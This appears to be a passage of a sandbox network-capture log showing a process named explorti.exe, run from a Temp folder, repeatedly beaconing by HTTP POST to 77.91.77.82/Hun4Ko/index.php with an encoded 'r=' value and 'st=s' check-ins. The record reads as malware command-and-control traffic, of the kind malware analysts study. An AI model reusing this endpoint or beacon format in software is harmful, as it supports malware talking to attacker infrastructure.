                                                                Jul 5, 2024 04:23:31.006547928 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:31.007241011 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:31.228542089 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.44976677.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:31.340780973 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:32.057574987 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:32.059794903 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:32.287636042 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.44976777.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:32.416476011 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:33.126724958 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:33 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:33.127479076 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:33.347933054 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:33 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.44976877.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:33.624241114 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:34.352545977 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:34.359522104 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:34.585289955 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.44976977.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:34.697236061 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:35.386133909 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:35 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:35.386725903 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:35.603096008 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:35 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.44977077.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:35.712718964 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:36.420730114 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:36.421453953 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:36.646673918 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.44977177.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:36.760266066 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:37.490860939 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:37.491487026 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:37.717454910 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.44977277.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:37.837862015 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:38.529313087 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:38.530031919 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:38.745621920 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.44977377.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:38.854192972 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:39.590507030 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:39.591196060 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:39.817998886 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                33192.168.2.44977477.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:39.933651924 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:40.625317097 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:40 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:40.625988960 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:40.842959881 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:40 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                34192.168.2.44977577.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:40.963102102 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:41.663203955 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:41 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:41.663881063 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:41.884958982 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:41 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                35192.168.2.44977677.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:41.994187117 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:42.722449064 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:42.723181963 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
